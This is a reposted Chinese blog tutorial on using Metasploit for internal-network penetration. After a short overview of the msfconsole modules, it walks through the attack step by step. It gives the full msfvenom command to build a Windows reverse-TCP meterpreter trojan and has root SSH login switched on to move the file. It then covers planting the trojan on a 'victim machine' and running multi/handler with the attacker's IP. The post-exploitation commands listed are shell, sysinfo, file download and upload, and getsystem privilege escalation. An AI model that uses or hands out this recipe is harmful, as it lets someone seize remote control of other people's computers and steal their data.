内网渗透之——msf工具使用

1.msfconsole

作用:
管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。
模块介绍:
exploits:攻击脚本
payloads:攻击载荷(攻击效果控制)
auxiliaru:辅助模块(扫描工具等)
post:后渗透模块(提取信息)
encoders编码模块
nops:无操作生成器

2.msfvenom

作用:
制作木马

3.msfencode

作用:
对木马进行编码

4.msf使用:

1.打开一个终端,输入msfconsole 进入应用
​​​​在这里插入图片描述
2.查看各个模块内容(例:show payloads)
在这里插入图片描述
3.选择带reverse和meterpreter(发送端接受端连接)的payloads进行反弹端口
例:此处选择windows/x64/meterpreter_reverse_tcp,使用use windows/x64/meterpreter_reverse_tcp选择此payloads,输入show options查看使用方法
在这里插入图片描述
4.再打开一个终端,进行木马制作,生成的木马在当前目录下,之后将该文件复制到windows下(如不能复制,可开启ssh,使用xshell的sz 1.exe下载命令进行操作:开启ssh服务,/etc/ssh/sshd_config第32行改为PermitRootLogin yes,之后xshell连接)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=本机ip lport=端口 -f exe -o 1.exe

在这里插入图片描述
5.将刚制作好的木马1.exe传到受害机上
在这里插入图片描述
6.再次输入msfconsole 进入应用,输入use exploit/multi/handler进入管理工具
在这里插入图片描述
7.设置监听刚才生成木马的同一payload:set payload windows/x64/meterpreter_reverse_tcp
在这里插入图片描述
8.配置管理机ip(攻击者本机):set lhost 192.168.16.130
在这里插入图片描述
9.执行此管理工具:输入exploit
在这里插入图片描述
10.运行刚刚上传的1.exe木马,再查看管理攻击,拿到连接meterpreter
在这里插入图片描述
11.输入?可查看攻击命令,之后进行攻击即可

例:

获取命令行:shell
在这里插入图片描述
获取系统信息:sysinfo
在这里插入图片描述
下载文件:download 1.txt
在这里插入图片描述
上传文件:upload 路径
在这里插入图片描述
提权:getsystem
在这里插入图片描述

发布了59 篇原创文章 · 获赞 166 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/wsnbbz/article/details/104904278